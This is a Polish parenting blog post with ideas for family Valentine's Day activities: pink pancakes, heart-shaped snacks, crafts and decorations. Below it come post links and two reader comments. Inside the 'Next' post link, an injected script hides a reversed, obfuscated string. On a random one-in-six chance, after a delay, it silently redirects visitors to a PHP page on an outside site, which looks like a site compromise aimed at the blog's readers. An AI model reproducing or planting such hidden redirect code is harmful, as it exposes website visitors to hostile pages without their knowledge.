Walentynkowe zabawy … dla całej rodziny.


W poprzednim wpisie poświęconym pomysłom na walentynkowe upominki, zapowiedziałam kolejną odsłonę inspiracji na Święto Zakochanych. I oto ona – najciekawsze moim zdaniem projekty i propozycje na rodzinne zabawy. W tym roku Walentynki to sobota! Jeśli tylko macie w domu dzieciaki w odpowiednim wieku (czyli takie, które już i jeszcze chcą się bawić z rodzicami), możecie zaplanować dla nich dzień pełen wrażeń.

Ten bardzo ogólny pomysł na wpis, konkretny stał się wczoraj. Zobaczyłam, że ktoś trafił na bloga, bo bardzo chciał wiedzieć … co robić w Walentynki, gdy ma się dziecko. I dotarło do mnie, że przecież dla wielu z Was w ciągu ostatniego roku życie bardzo się zmieniło. Wraz z dzieckiem nie znikają co prawda okazje do romantycznych wieczorów i upojnych nocy, ale chyba nie będę w błędzie, jeśli powiem: to już nie to samo. Jest gorzej, bo nie ma już tyle czasu i sił na czas we dwoje? Lepiej, bo wraz z dzieckiem Wasza miłość weszła na zupełnie inny poziom? Dla mnie jest lepiej i ciekawiej! Walentynki nadal mogą być wyłącznie dla Waszej dwójki, ale mogą być również świętem rodzinnym, doskonałą okazją do wspólnej zabawy i nauki. Na wiele ciekawych sposobów można pokazać dziecku, czym są uczucia, jak je okazywać, jak sprawiać radość bliskim … Czerwone serduszka mogą przyjąć różne formy – pysznego śniadania, plastycznego projektu czy ciekawej wycieczki.

Wyszukałam dla Was i dla nas ciekawe propozycje na 14. lutego – kulinarne, dekoracyjne i upominkowe. Takie, które z powodzeniem możecie zrobić rodzinnie i dodać jeszcze jedno piękne wspomnienie do Waszej kolekcji.

 Zacznijmy od śniadania …

Nie macie truskawek? Może być jabłko! A co powiecie na naleśniki z dodatkiem soku z buraków? Będą różowe a dodatkowo można je wykroić w serduszka. A może tosty, kanapki albo jajko sadzone?

Od śniadania niedaleko już do przekąsek i deserów – galaretki, ciast czy ciasteczek. Na przykład takich:

Dlaczego nigdy na to nie wpadłam? 😀

Tarta truskawkowa.

Sernik z białą czekoladą i sokiem truskawkowym.

Albo nieco zdrowszy deser:

A co powiecie na domową pizzę, w nieco innym wydaniu? 🙂

No dobrze,  nie samym jedzeniem człowiek żyje 😉 Jeśli u Was w domu na projekty kulinarne nie znajdą się chętni, zawsze można pobawić się w inny sposób. Poniżej kilka propozycji na zabawne projekty dla całej rodziny.

Dżdżownice miłości?

A może motylki?

Coś dla prawdziwych facetów!

Niespodzianka dla gości?

Drugie życie tekturowych rurek po papierze toaletowym? Pewnie!

A może tak odciskane rączki albo stópki?

Po co kupować Walentynkę, jeśli można zrobić samemu?

Na koniec kilka propozycji na dekoracje. Kto powiedział, że nie może być delikatnie i bez różu?

To jak, sobota zaplanowana? My będziemy działać 🙂

(zdjęcia: flickr.com; pinterest.com)

Previous Mamą być ... w USA.
Next Blog roku, czyli k<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to pływał bez majtek.

Suggested Posts

Wpadki rodzicielskie – poznaj moje TOP 5!

Nauczyciele hejtu.

Piwnooka 2016.

„W co się bawić, w co się bawić …” z rocznym maluchem?

Szósty miesiąc Niny i nowe smaki!

Mój sprzymierzeniec w walce o mniejszy rozmiar!

2 komentarze

  1. 7 lutego 2015
    Odpowiedz

    Ale mi narobiłaś smaku na te pyszności!

  2. 7 lutego 2015
    Odpowiedz

    A dla mnie najwspanialszą walentynką od męża byłoby gdyby uśpił dziecko a ja mogłabym w tym czasie wziąć długą kąpiel i poczytać książkę…

Leave a reply

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *